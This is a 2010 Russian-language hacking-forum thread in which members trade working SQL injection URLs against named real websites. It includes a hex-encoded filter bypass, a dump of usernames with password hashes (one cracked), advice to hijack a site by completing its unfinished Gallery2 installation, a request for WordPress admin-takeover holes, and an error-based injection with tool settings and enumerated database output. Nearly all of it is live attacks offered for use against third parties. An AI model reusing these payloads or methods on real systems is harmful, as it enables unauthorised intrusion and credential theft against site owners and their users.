HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.04.2010, 15:34
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

hahhaha т.е. какой нахер админский доступ, я имелл ввиду не уязвимость в другом параметре а именно обход фильтрации select в параметре id http://www.keyin.ca/news.asp?id=52&news=showall
 
Ответить с цитированием

  #2  
Старый 24.04.2010, 16:23
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
Сообщение от pinch  
hahhaha т.е. какой нахер админский доступ, я имелл ввиду не уязвимость в другом параметре а именно обход фильтрации select в параметре id http://www.keyin.ca/news.asp?id=52&news=showall
http://www.keyin.ca/news.asp?id=-52+union+%73%65%6C%65%63%74+1,2,3,version(),5&news =showall
 
Ответить с цитированием

  #3  
Старый 24.04.2010, 19:36
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

thanks как я недодумался....
 
Ответить с цитированием

  #4  
Старый 24.04.2010, 22:34
$T@$
Новичок
Регистрация: 29.03.2010
Сообщений: 4
Провел на форуме:
30475

Репутация: 2
По умолчанию

WordPress 2.7.1
Имею ввиду уязвимость, позволяющая узнать пароль админа, сбросить его себе на ящик, подменить исполняемый код, SQL инъекция, узнать e-mail администратора?

Условие - регистрация закрыта, постинг запрещён, для рядового пользователя разрешены только комментарии.
 
Ответить с цитированием

  #5  
Старый 25.04.2010, 11:42
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

На этом сайте достал такие hash

http://slr-zone.com/lens/lens1.php?id=509+union+select+concat_ws(0x3a,g_use rName,g_hashedPassword)+from+g2_User+--+

guest:LajD09f455fd66378f12280bfd7894ce5b46
admin:kNaScfa395e30ad8195a4975c91eee51f33c

подбор

09f455fd66378f12280bfd7894ce5b46:LajD

В админку попасть не удается

http://slr-zone.com/shop/

Что можете еще посоветовать?

Заранее всем спасибо!
 
Ответить с цитированием

  #6  
Старый 25.04.2010, 14:25
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от FlaktW  
На этом сайте достал такие hash

http://slr-zone.com/lens/lens1.php?id=509+union+select+concat_ws(0x3a,g_use rName,g_hashedPassword)+from+g2_User+--+

guest:LajD09f455fd66378f12280bfd7894ce5b46
admin:kNaScfa395e30ad8195a4975c91eee51f33c

подбор

09f455fd66378f12280bfd7894ce5b46:LajD

В админку попасть не удается

http://slr-zone.com/shop/

Что можете еще посоветовать?

Заранее всем спасибо!

прозреваю, что это хеши от старой инсталляции gallery2, которая лежит в какой-то папке на серве.

http://slr-zone.com/shop/ - это неустановленная gallery2, можешь завершить инсталляцию, вписав свои данные и там видно будет.
 
Ответить с цитированием

  #7  
Старый 25.04.2010, 16:04
-=ASSKAKO=-
Познающий
Регистрация: 10.01.2009
Сообщений: 31
Провел на форуме:
1128838

Репутация: 36
По умолчанию

подскажите что это?
Код:
http://www.hack0wn.com/view.php?xroot=271.0+order+by+1--&cat=exploits
есть ли тут уязвимость?
 
Ответить с цитированием

  #8  
Старый 25.04.2010, 16:51
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

есть) хекеры там типо:
Код:
http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+&cat=exploits
 
Ответить с цитированием

  #9  
Старый 25.04.2010, 18:51
DrakonHaSh
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305

Репутация: 30
По умолчанию

Цитата:
Сообщение от Pashkela  
есть) хекеры там типо:
Код:
http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+&cat=exploits
а так такую уязвимость через тулзу раскрутить ?
сам пытался, но ни через $source_sql ни через $f_url ни в [11] Mysql inj NAME_CONST ни в [12] Mysql inj floor(rand()) подобрать правильный вариант не получилось
 
Ответить с цитированием

  #10  
Старый 26.04.2010, 00:46
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

Цитата:
Сообщение от DrakonHaSh  
а так такую уязвимость через тулзу раскрутить ?
сам пытался, но ни через $source_sql ни через $f_url ни в [11] Mysql inj NAME_CONST ни в [12] Mysql inj floor(rand()) подобрать правильный вариант не получилось
Код:
$method = 1; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
$f_table = "information_schema.tables"; # 
$f_url = "http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+"; # url
$f_plus = "+"; # %20,%2b & etc.
$f_filtr = "a)--+&cat=exploits"; # close SQL

-----------------------------------------
System information:
-----------------------------------------
base:hack0wn
basedir:/usr/
datadir:/var/lib/mysql/
os:redhat-linux-gnu
tmpdir:/tmp/
ver:5.0.86-log
-----------------------------------------
Tables in information_schema.tables - 27
-----------------------------------------
ROUTINES
VIEWS
SCHEMA_PRIVILEGES
advisories
SCHEMATA
bins
PROFILING
exploits
KEY_COLUMN_USAGE
comments
COLLATIONS
TABLE_CONSTRAINTS
profiles
COLUMN_PRIVILEGES
TABLE_PRIVILEGES
shellcodes
COLUMNS
TRIGGERS
sources
CHARACTER_SETS
TABLES
papers
COLLATION_CHARACTER_SET_APPLICABILITY
USER_PRIVILEGES
videos
STATISTICS
misc
Цитата:
Сообщение от auth_root  
Pashkela
Это чем?
https://forum.antichat.net/thread148915-toolza.html

Последний раз редактировалось Pashkela; 26.04.2010 в 02:44..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.